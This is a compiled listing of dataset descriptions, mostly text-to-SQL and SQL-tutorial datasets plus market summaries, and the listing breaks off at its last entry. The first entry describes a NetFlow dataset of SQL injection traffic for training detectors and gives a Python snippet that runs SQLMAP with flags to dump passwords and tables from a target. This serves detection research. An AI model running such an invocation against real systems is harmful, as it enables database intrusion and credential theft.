License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
Introduction
These datasets contain SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are Union-query SQL injection and Blind SQL injection. To perform the attacks, the SQLMAP tool was used.
NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The first dataset was collected to train the detection models (D1); the other was collected using different attacks than those used in training, to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
| Dataset | Aim | Samples | Benign-malicious traffic ratio |
|---------|-----|---------|--------------------------------|
| D1 | Training | 400,003 | 50% |
| D2 | Test | 57,239 | 50% |
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has the ipt_netflow sensor installed. The sensor consists of a Linux kernel module using Iptables, which processes the packets and converts them into NetFlow flows.
DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1,800 seconds (30 minutes).
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts; users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks: on the one hand, it routes packets to the Internet; on the other hand, it sends the traffic to a NetFlow data generation node (this process is carried out in the same way for packets received from the Internet).
The malicious traffic collected (SQLI attacks) was generated using SQLMAP. SQLMAP is a penetration-testing tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed from 16 nodes, each launching SQLMAP with the parameters listed in the following table.
| Parameters | Description |
|------------|-------------|
| '--banner', '--current-user', '--current-db', '--hostname', '--is-dba', '--users', '--passwords', '--privileges', '--roles', '--dbs', '--tables', '--columns', '--schema', '--count', '--dump', '--comments' | Enumerate users, password hashes, privileges, roles, databases, tables and columns |
| --level=5 | Increase the probability of a false positive identification |
| --risk=3 | Increase the probability of extracting data |
| --random-agent | Select the User-Agent randomly |
| --batch | Never ask for user input; use the default behavior |
| --answers="follow=Y" | Predefined answers to yes |
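For illustration, the flags above can be assembled into a single SQLMAP invocation. The sketch below launches it from Python; the target URL is a placeholder, since the description does not give the victim form URLs:

```python
import subprocess

# Hypothetical target URL; the real victim form URLs are not given in the description.
target = "http://192.0.2.10/vulnerable_form.php?id=1"

# Assemble the SQLMAP invocation from the parameters listed in the table above.
cmd = [
    "sqlmap", "-u", target,
    "--batch", "--random-agent", "--answers=follow=Y",
    "--level=5", "--risk=3",
    "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
    "--users", "--passwords", "--privileges", "--roles",
    "--dbs", "--tables", "--columns", "--schema", "--count", "--dump", "--comments",
]
subprocess.run(cmd, check=True)
```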
Every node executed SQLIA against 200 victim nodes. The victim nodes deployed a web form vulnerable to Union-type injection attacks, connected to either the MySQL or the SQL Server database engine (50% of the victim nodes deployed MySQL and the other 50% deployed SQL Server).
The web service was accessible on ports 443 and 80, the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test set was collected under different conditions: for D1, SQLIA was performed using Union attacks on the MySQL and SQL Server databases.
For D2, however, Blind SQL injection attacks were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1: in D2, the IP address space was 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes.
As the MySQL server we ran MariaDB version 10.4.12; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were also used.
License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
Overview
This dataset builds from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and the SQL query answering the question using the CREATE statement as context. This dataset was built with text-to-SQL LLMs in mind, intending to prevent hallucination of column and table names often seen when models are trained on text-to-SQL datasets. The CREATE TABLE statement can often be copied and pasted from different DBMSs and provides table names, column… See the full description on the dataset page: https://huggingface.co/datasets/b-mc2/sql-create-context.
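As a quick illustration (not part of the dataset card), the dataset can be pulled with the Hugging Face `datasets` library; the field names used below are taken from the dataset page and should be verified against the actual schema:

```python
from datasets import load_dataset

# Requires the `datasets` library; field names are taken from the dataset card.
ds = load_dataset("b-mc2/sql-create-context", split="train")

example = ds[0]
print(example["question"])  # natural language question
print(example["context"])   # CREATE TABLE statement used as context
print(example["answer"])    # SQL query answering the question
```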
License: Other, https://choosealicense.com/licenses/other/
View code: https://colab.research.google.com/drive/1rLk-mdsWsdxwQdYYJS24rAP9KABtbiqu?usp=sharing
Example:
{"messages": [
{"role": "system", "content": "You are a SQL expert assistant. Generate clear, efficient SQL queries based on user requests. Provide only the SQL query without any additional text or explanation."}
{"role": "user", "content": "What are the top 5 most popular genres of music in the database, based on the number of tracks⌠See the full description on the dataset page: https://huggingface.co/datasets/fknguedia/SQL-GENERATOR-DATASETS.
License: Apache License 2.0, http://www.apache.org/licenses/LICENSE-2.0
This dataset contains 56,964 conversations between an AI assistant and a (fake) "Human" (generated) in Dutch, specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.
Data Instances
{'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},
Data Fields
id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]
input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].
topic: the topic description
Dataset Creation
Both the conversations and the topics were translated with OpenAI's API for gpt-3.5-turbo, using max_tokens=1024 and temperature=0 as parameters.
The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):
CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.
Here are the requirements that you should adhere to:
1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other;
2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places;
3. ensure accurate translation and keep the correctness of the conversation;
4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias;
5. translate the human's text using informal, but standard, language;
6. make sure to avoid biases (such as gender bias, grammatical bias, social bias);
7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang};
8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested;
9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.
Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.
"""
The prompt to translate the topic is:
TOPIC_TRANSLATION_PROMPT = (
    "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
    " summarizing manner. Translate accurately and formally. Do not provide any explanation"
    " about the translation and do not include the original title."
)
The system message was:
You are a helpful assistant that translates English to Dutch to the requirements that are given to you.
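The exact pipeline code is not included here, but the parameters above are enough to sketch how each translation call may have looked with the current openai Python client; how the conversation text is attached to the prompt is an assumption:

```python
from openai import OpenAI

client = OpenAI()  # assumes the OPENAI_API_KEY environment variable is set

SYSTEM_MESSAGE = (
    "You are a helpful assistant that translates English to Dutch "
    "to the requirements that are given to you."
)

def translate_conversation(conversation: str, prompt_template: str,
                           src_lang: str = "English", tgt_lang: str = "Dutch") -> str:
    """Translate one Baize conversation with the template shown above."""
    prompt = prompt_template.format(src_lang=src_lang, tgt_lang=tgt_lang)
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        max_tokens=1024,
        temperature=0,
        messages=[
            {"role": "system", "content": SYSTEM_MESSAGE},
            # How the conversation text was appended to the prompt is an assumption.
            {"role": "user", "content": prompt + "\n\n" + conversation},
        ],
    )
    return response.choices[0].message.content
```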
Note that 82 items (0.1%) were not successfully translated: the translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. The IDs of these missing items are the same as those listed above under id.
The translation quality has not been verified. Use at your own risk!
Licensing Information
Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.
This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI's large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.
If you use this dataset, you must also follow the Sharing and Usage policies.
As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.
This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.
License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
Blockchain data query: dune-sql-generate-large-series-sample
License: CC0 1.0, https://creativecommons.org/publicdomain/zero/1.0/
By Huggingface Hub
A large crowd-sourced dataset for developing natural language interfaces for relational databases. WikiSQL is a dataset of 80654 hand-annotated examples of questions and SQL queries distributed across 24241 tables from Wikipedia.
The data fields are the same among all splits, and each file contains information on the phase, question, table, and SQL for each example. Possible uses include:
- This dataset can be used to develop natural language interfaces for relational databases.
- This dataset can be used to develop a knowledge base of common SQL queries.
- This dataset can be used to generate a training set for a neural network that translates natural language into SQL queries
If you use this dataset in your research, please credit the original authors.
License
License: CC0 1.0 Universal (CC0 1.0) - Public Domain Dedication No Copyright - You can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information.
File: validation.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
File: train.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
File: test.csv | Column name | Description | |:--------------|:---------------------------------------------------------| | phase | The phase of the data collection. (String) | | question | The question asked by the user. (String) | | table | The table containing the data for the question. (String) | | sql | The SQL query corresponding to the question. (String) |
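A minimal sketch of loading one of these CSV splits with pandas (column names as listed in the tables above):

```python
import pandas as pd

# Load one of the CSV splits described above; all four columns are strings.
df = pd.read_csv("validation.csv")
print(df[["phase", "question", "table", "sql"]].head())
```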
If you use this dataset in your research, please credit the original authors and Huggingface Hub.
License: Attribution-ShareAlike 3.0 (CC BY-SA 3.0), https://creativecommons.org/licenses/by-sa/3.0/
sql-create-context-v2 Dataset
Overview
The sql-create-context-v2 dataset enhances the original dataset built from WikiSQL and Spider, focusing on text-to-SQL tasks with a special emphasis on reducing hallucination of column and table names. This version introduces a JSONL format for more efficient data processing and iteration, alongside a structured approach to representing SQL queries in the dataset entries.
Key Enhancements
Dataset Format: Transitioned to… See the full description on the dataset page: https://huggingface.co/datasets/ramachetan22/sql-create-context-v2.
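Since the full description is truncated here, the following is only a hedged sketch of reading a JSONL export of the dataset; the file name and the question/context/answer field names (carried over from the original sql-create-context) are assumptions:

```python
import json

# File name and field names are assumptions (question/context/answer,
# carried over from the original sql-create-context).
with open("sql_create_context_v2.jsonl", encoding="utf-8") as f:
    records = [json.loads(line) for line in f]

print(records[0])
```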
Terms: https://dataintelo.com/privacy-and-policy
According to our latest research, the global SQL Generation AI market size reached USD 1.42 billion in 2024, reflecting a robust expansion driven by the rapid adoption of artificial intelligence technologies in database management and analytics. The market is set to grow at a compelling CAGR of 27.6% from 2025 to 2033, with the total market size forecasted to reach USD 13.18 billion by 2033. This remarkable growth trajectory is primarily fueled by advancements in natural language processing, the increasing complexity of enterprise data environments, and the demand for automation in SQL query generation to enhance productivity and reduce operational costs.
The primary growth factors propelling the SQL Generation AI market revolve around the escalating need for data-driven decision-making and the democratization of data access across organizations. As enterprises generate and store vast amounts of data, the ability to quickly and accurately extract actionable insights becomes critical. SQL Generation AI solutions, leveraging advanced machine learning and natural language processing algorithms, enable non-technical users to generate complex SQL queries using simple natural language instructions. This not only reduces the dependency on specialized database administrators but also accelerates the pace of business intelligence and analytics initiatives. The proliferation of self-service analytics and the integration of AI-powered query generation into popular business intelligence platforms further amplify market growth, making it easier for organizations to unlock the value of their data assets.
Another significant driver is the ongoing digital transformation across various industries, which has led to the modernization of legacy IT infrastructures and the adoption of cloud-based data management solutions. Organizations are increasingly migrating their databases to the cloud to benefit from scalability, flexibility, and cost-efficiency. SQL Generation AI tools are being integrated with cloud data warehouses and analytics platforms, allowing for seamless query generation and real-time data analysis. This shift not only optimizes data workflows but also supports hybrid and multi-cloud strategies, enabling enterprises to manage and analyze data across diverse environments. The rising volume and diversity of data, coupled with the need for real-time insights, are compelling organizations to invest in AI-powered SQL generation to maintain a competitive edge.
Additionally, the COVID-19 pandemic has accelerated the adoption of digital technologies, including AI-driven SQL generation, as organizations seek to automate routine tasks and enhance operational resilience. The growing emphasis on remote work and distributed teams has highlighted the importance of intuitive data access and collaboration tools. SQL Generation AI solutions facilitate seamless collaboration between business users and data teams, bridging the gap between technical and non-technical stakeholders. This has led to increased demand across sectors such as BFSI, healthcare, retail, and manufacturing, where timely data insights are crucial for strategic decision-making. The market is also witnessing heightened interest from small and medium enterprises, which are leveraging AI-powered SQL generation to level the playing field with larger competitors.
Regionally, North America continues to dominate the SQL Generation AI market, accounting for the largest share in 2024, followed by Europe and Asia Pacific. The presence of major technology vendors, early adoption of AI and cloud technologies, and a strong focus on data-driven innovation contribute to North America's leadership position. Europe is witnessing rapid growth, driven by stringent data regulations and increasing investments in digital transformation initiatives. Meanwhile, Asia Pacific is emerging as a high-growth region, fueled by expanding IT infrastructure, a burgeoning startup ecosystem, and rising demand for advanced analytics solutions in countries such as China, India, and Japan. Latin America and the Middle East & Africa are also showing promising growth potential as organizations in these regions accelerate their digital journeys.
The SQL Generation AI market by component is broadly segmented into Software and Services. The software segment commands the majority market share, as organizations increasingly dep
License: Attribution-NonCommercial-ShareAlike 4.0 (CC BY-NC-SA 4.0), https://creativecommons.org/licenses/by-nc-sa/4.0/
This data contains CREATE DATABASE, USE, CREATE TABLE (INT, VARCHAR, DATE), DESCRIBE, ALTER TABLE (ADD, MODIFY, CHAR, VARCHAR, AFTER, RENAME COLUMN, TO, DROP COLUMN, DROP), SHOW TABLES, RENAME TABLE (TO), and DROP TABLE.
License: Apache License 2.0, https://www.apache.org/licenses/LICENSE-2.0
This project involves analyzing and transforming data from a bike warehouse database using SQL. The goal is to clean, transform, and query the data to generate insights about products, employees, customers, sales, and trends.
The SAP Bikes Sales database contains various tables that represent business data for a bike warehouse, such as information on products, sales, employees, business partners, and more. This project focuses on cleaning and transforming data, optimizing database schema, and generating SQL queries to gain business insights.
1. **Data Cleaning & Transformation**:
   - Remove duplicate records from key tables.
   - Drop unnecessary columns and handle null values.
   - Populate new columns based on existing data.
   - Merge related tables to create new insights.
2. **Business Insights Queries**:
   - Top-selling Products: Identify products with the highest sales quantities and total revenue.
   - Sales Performance by Product Category: Analyze revenue and order counts by product category.
   - Employee Sales Performance: Track employees' contribution to sales volumes and revenue.
   - Customer Segmentation: Examine the number of orders placed by business partners and their total sales value.
   - Sales Trends: Analyze sales trends over time and calculate average order values.
- **Addresses Table**:
  - Checked for duplicate ADDRESSID values.
- **BusinessPartners Table**:
  - Handled duplicates and missing or incorrect data.
  - Dropped the unnecessary FAXNUMBER column because it was empty.
- **Employee Table**:
  - Dropped unnecessary columns.
  - Populated NAME_INITIALS based on the employee's first, middle, and last name initials.
  - Fixed column type issues.
- **Product Categories and Product Texts**:
  - Merged the ProductCategories and ProductCategoryText tables into a new CombinedProductCategories table for easier analysis.
- **Products Table**:
  - Dropped irrelevant columns such as WIDTH, DEPTH, HEIGHT, etc.
- **Sales Order Items Table**:
  - Fixed null values in GROSSAMOUNT and created a TOTALGROSSAMOUNT column to track sales volume.
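As a rough illustration of the kind of SQL behind the Sales Order Items cleanup above (the sketch uses SQLite from Python for self-containment; the exact table definitions, the QUANTITY column, and the target DBMS are assumptions):

```python
import sqlite3

# Illustrative only: assumes a local SQLite copy of the SAP Bikes tables;
# the real project may target MySQL/SQL Server, and QUANTITY is an assumed column.
con = sqlite3.connect("sap_bikes.db")

con.executescript("""
    -- Replace null gross amounts before aggregating.
    UPDATE SalesOrderItems SET GROSSAMOUNT = 0 WHERE GROSSAMOUNT IS NULL;

    -- Add and populate the per-item total used to track sales volume.
    ALTER TABLE SalesOrderItems ADD COLUMN TOTALGROSSAMOUNT REAL;
    UPDATE SalesOrderItems SET TOTALGROSSAMOUNT = GROSSAMOUNT * QUANTITY;
""")
con.commit()
```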
### 2. Database Diagram and Relationships
In addition to the data cleaning and analysis, a database diagram has been create...
License: Apache License 2.0, https://www.apache.org/licenses/LICENSE-2.0
synthetic_text_to_sql
gretelai/synthetic_text_to_sql is a rich dataset of high-quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:
- 105,851 records partitioned into 100,000 train and 5,851 test records
- ~23M total tokens, including ~12M SQL tokens
- Coverage across 100 distinct… See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
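A minimal example of loading the dataset and its published splits with the Hugging Face `datasets` library (record field names are not listed here, so the sketch just inspects one record):

```python
from datasets import load_dataset

# The dataset ships with explicit train/test splits (100,000 / 5,851 records).
ds = load_dataset("gretelai/synthetic_text_to_sql")
print(ds["train"].num_rows, ds["test"].num_rows)
print(ds["train"][0])  # inspect a record rather than assuming its field names
```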
License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
Replication package for the paper:
Ludovic Courtès, Timothy Sample, Simon Tournier, Stefano Zacchiroli. Source Code Archiving to the Rescue of Reproducible Deployment. ACM REP'24, June 18-20, 2024, Rennes, France. https://doi.org/10.1145/3641525.3663622
Generating the paper
The paper can be generated using the following command:
guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make
This uses GNU Guix to run make in the exact same computational environment used when preparing the paper. The computational environment is described by two files. The channels.scm file specifies the exact version of the Guix package collection to use. The manifest.scm file selects a subset of those packages to include in the environment.
It may be possible to generate the paper without Guix. To do so, you will need the following software (on top of a Unix-like environment):
GNU Make
SQLite 3
GNU AWK
Rubber
Graphviz
TeXLive
Structure
data/ contains the data examined in the paper
scripts/ contains dedicated code for the paper
logs/ contains logs generated during certain computations
Preservation of Guix
Some of the claims in the paper come from analyzing the Preservation of Guix (PoG) database as published on January 26, 2024. This database is the result of years of monitoring the extent to which the source code referenced by Guix packages is archived. This monitoring has been carried out by Timothy Sample who occasionally publishes reports on his personal website: https://ngyro.com/pog-reports/latest/. The database included in this package (data/pog.sql) was downloaded from https://ngyro.com/pog-reports/2024-01-26/pog.db and then exported to SQL format. In addition to the SQL file, the database schema is also included in this package as data/schema.sql.
The database itself is largely the result of scripts, but also of manual adjustments (where necessary or convenient). The scripts are available at https://git.ngyro.com/preservation-of-guix/, which is preserved in the Software Heritage archive as well: https://archive.softwareheritage.org/swh:1:snp:efba3456a4aff0bc25b271e128aa8340ae2bc816;origin=https://git.ngyro.com/preservation-of-guix. These scripts rely on the availability of source code in certain locations on the Internet, and therefore will not yield exactly the same result when run again.
Analysis
Here is an overview of how we use the PoG database in the paper. The exact way it is queried to produce graphs and tables for the paper is laid out in the Makefile.
The pog-types.sql query gives the counts of each source type (e.g. 'git' or 'tar-gz') for each commit covered by the database.
The pog-status.sql query gives the archival status of the sources by commit. For each commit, it produces a count of how many sources are stored in the Software Heritage archive, missing from it, or unknown if stored or missing. The pog-status-total.sql query does the same thing but over all sources without sorting them into individual commits.
The disarchive-ratio.sql query estimates the success rate of Disarchive disassembly.
Finally, the swhid-ratio.sql query gives the proportion of sources for which the PoG database has an SWHID.
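A hedged sketch of reproducing one of these queries outside the Makefile: rebuild the database from the included SQL dump and execute one of the query files. The file locations are assumptions, each query file is assumed to contain a single SELECT statement, and the dump is assumed to be SQLite-compatible SQL:

```python
import sqlite3

# Rebuild the database from the SQL dump included in the package, then run one
# of the packaged queries.
con = sqlite3.connect(":memory:")
with open("data/pog.sql", encoding="utf-8") as dump:
    con.executescript(dump.read())

with open("pog-types.sql", encoding="utf-8") as query_file:  # hypothetical path
    for row in con.execute(query_file.read()):
        print(row)
```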
Estimating missing sources
The Preservation of Guix database only covers sources from a sample of commits to the Guix repository. This greatly simplifies the process of collecting the sources at the risk of missing a few. We estimate how many are missed by searching Guix's Git history for Nix-style base-32 hashes. The result of this search is compared to the hashes in the PoG database.
A naïve search of Git history results in an overestimate due to Guix's branch development model: we find hashes that were never exposed to users of 'guix pull'. To work around this, we also approximate the history of commits available to 'guix pull'. We do this by scraping push events from the guix-commits mailing list archives (data/guix-commits.mbox). Unfortunately, those archives are not quite complete. Missing history is reconstructed in the data/missing-links.txt file.
This estimate requires a copy of the Guix Git repository (not included in this package). The repository can be obtained from GNU at https://git.savannah.gnu.org/git/guix.git or from the Software Heritage archive: https://archive.softwareheritage.org/swh:1:snp:9d7b8dcf5625c17e42d51357848baa226b70e4bb;origin=https://git.savannah.gnu.org/git/guix.git. Once obtained, its location must be specified in the Makefile.
To generate the estimate, use:
guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make data/missing-sources.txt
If not using Guix, you will need additional software beyond what is used to generate the paper:
GNU Guile
GNU Bash
GNU Mailutils
GNU Parallel
Measuring link rot
In order to measure link rot, we ran Guix Scheme scripts, i.e., scripts that use Guix as a Scheme library. The scripts depend on the state of the world at the very specific moment when they were run, so it is not possible to reproduce the exact same outputs. However, their tendency over time should be very similar. To run them, you need an installation of Guix. For instance,
guix repl -q scripts/table-per-origin.scm
When running these scripts for the paper, we tracked their output and saved it inside the logs directory.
Terms: https://www.verifiedmarketresearch.com/privacy-policy/
SQL In-Memory Database Market size was valued at USD 9.26 Billion in 2024 and is projected to reach USD 35.7 Billion by 2032, growing at a CAGR of 20.27% from 2026 to 2032.
SQL In-Memory Database Market Drivers
Demand for Real-Time Analytics and Processing: Businesses increasingly require real-time insights from their data to make faster and more informed decisions. SQL In-Memory databases excel at processing data much faster than traditional disk-based databases, enabling real-time analytics and operational dashboards.
Growth of Big Data and IoT Applications: The rise of Big Data and the Internet of Things (IoT) generates massive amounts of data that needs to be processed quickly. SQL In-Memory databases can handle these high-velocity data streams efficiently due to their in-memory architecture.
Improved Performance for Transaction Processing Systems (TPS): In-memory databases offer significantly faster query processing times compared to traditional databases. This translates to improved performance for transaction-intensive applications like online banking, e-commerce platforms, and stock trading systems.
Reduced Hardware Costs (in some cases): While implementing an in-memory database might require an initial investment in additional RAM, it can potentially reduce reliance on expensive high-performance storage solutions in specific scenarios.
Focus on User Experience and Application Responsiveness: In today's digital landscape, fast and responsive applications are crucial. SQL In-Memory databases contribute to a smoother user experience by enabling quicker data retrieval and transaction processing.
However, it's important to consider some factors that might influence market dynamics:
Limited Data Capacity: In-memory databases are typically limited by the amount of available RAM, making them less suitable for storing massive datasets compared to traditional disk-based solutions.
Higher Implementation Costs: Setting up and maintaining an in-memory database can be more expensive due to the additional RAM requirements compared to traditional databases.
Hybrid Solutions: Many organizations opt for hybrid database solutions that combine in-memory and disk-based storage, leveraging the strengths of both for different data sets and applications.
License: CC0 1.0, https://spdx.org/licenses/CC0-1.0.html
Objective: To enhance the accuracy of information retrieval from pharmacovigilance (PV) databases by employing Large Language Models (LLMs) to convert natural language queries (NLQs) into Structured Query Language (SQL) queries, leveraging a business context document.
Materials and Methods: We utilized OpenAI's GPT-4 model within a retrieval-augmented generation (RAG) framework, enriched with a business context document, to transform NLQs into executable SQL queries. Each NLQ was presented to the LLM randomly and independently to prevent memorization. The study was conducted in three phases, varying query complexity and assessing the LLM's performance both with and without the business context document.
Results: Our approach significantly improved NLQ-to-SQL accuracy, increasing from 8.3% with the database schema alone to 78.3% with the business context document. This enhancement was consistent across low, medium, and high complexity queries, indicating the critical role of contextual knowledge in query generation.
Discussion: The integration of a business context document markedly improved the LLM's ability to generate accurate SQL queries (i.e., both executable and returning semantically appropriate results). Performance reached a maximum of 85% when high complexity queries are excluded, suggesting promise for routine deployment.
Conclusion: This study presents a novel approach to employing LLMs for safety data retrieval and analysis, demonstrating significant advancements in query generation accuracy. The methodology offers a framework applicable to various data-intensive domains, enhancing the accessibility of information retrieval for non-technical users.
Methods: Test set of NLQs used in the paper "Automating Pharmacovigilance Evidence Generation: Using Large Language Models to Produce Context-Aware SQL". Also included are the Python scripts for the LLM processing, the R code for statistical analysis of results, and a copy of the business context document and essential tables.
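The exact prompt used in the study is not reproduced in this description, but a minimal sketch of the context-augmented call it describes, using the current OpenAI Python client, might look like this (prompt wording and structure are assumptions):

```python
from openai import OpenAI

client = OpenAI()  # assumes the OPENAI_API_KEY environment variable is set

def nlq_to_sql(nlq: str, schema_ddl: str, business_context: str) -> str:
    """Hedged sketch of the context-augmented NLQ-to-SQL call; the actual
    prompt wording used in the study is not reproduced here."""
    system = ("You translate natural language questions about a pharmacovigilance "
              "database into executable SQL. Use only the tables and columns provided.")
    user = (f"Database schema:\n{schema_ddl}\n\n"
            f"Business context document:\n{business_context}\n\n"
            f"Question: {nlq}\n\nReturn only the SQL query.")
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "system", "content": system},
                  {"role": "user", "content": user}],
    )
    return response.choices[0].message.content
```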
License: Attribution-NonCommercial 4.0 (CC BY-NC 4.0), https://creativecommons.org/licenses/by-nc/4.0/
This data contains CREATE TABLE, INT PRIMARY KEY, VARCHAR, SELECT * FROM, ALTER TABLE, MODIFY, INT AUTO_INCREMENT, ADD, NOT NULL, and DESC.
License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
It has never been easier to solve database-related problems using SQL, and the following gives you an opportunity to understand how I was able to figure out some of the interrelationships between databases using the Panoply.io tool.
I was able to insert a coronavirus dataset and create a submittable, reusable result. I hope it helps you work in a data warehouse environment.
The following is a list of SQL commands performed on the dataset attached below, with the final output stored in the Exports folder.

Query 1:
SELECT "Province/State" AS "Region", Deaths, Recovered, Confirmed FROM "public"."coronavirus_updated" WHERE Recovered>(Deaths/2) AND Deaths>0
Description: How do we estimate where Coronavirus has infiltrated but there is still effective recovery amongst patients? We can view those places by having recoveries more than twice the death toll.

Query 2:
SELECT country, sum(confirmed) as "Confirmed Count", sum(Recovered) as "Recovered Count", sum(Deaths) as "Death Toll" FROM "public"."coronavirus_updated" WHERE Recovered>(Deaths/2) AND Confirmed>0 GROUP BY country
Description: The Coronavirus epidemic has infiltrated multiple countries, and the only way to be safe is by knowing the countries which have confirmed Coronavirus cases. So here is a list of those countries.

Query 3:
SELECT country as "Countries where Coronavirus has reached" FROM "public"."coronavirus_updated" WHERE confirmed>0 GROUP BY country
Description: The Coronavirus epidemic has infiltrated multiple countries, and the only way to be safe is by knowing the countries which have confirmed Coronavirus cases. So here is a list of those countries.

Query 4:
SELECT country, sum(suspected) as "Suspected Cases under potential CoronaVirus outbreak" FROM "public"."coronavirus_updated" WHERE suspected>0 AND deaths=0 AND confirmed=0 GROUP BY country ORDER BY sum(suspected) DESC
Description: Coronavirus is spreading at an alarming rate. Knowing which countries are newly getting the virus is important, because if timely measures are taken in these countries, casualties could be prevented. Here is a list of suspected cases with no virus-related deaths.

Query 5:
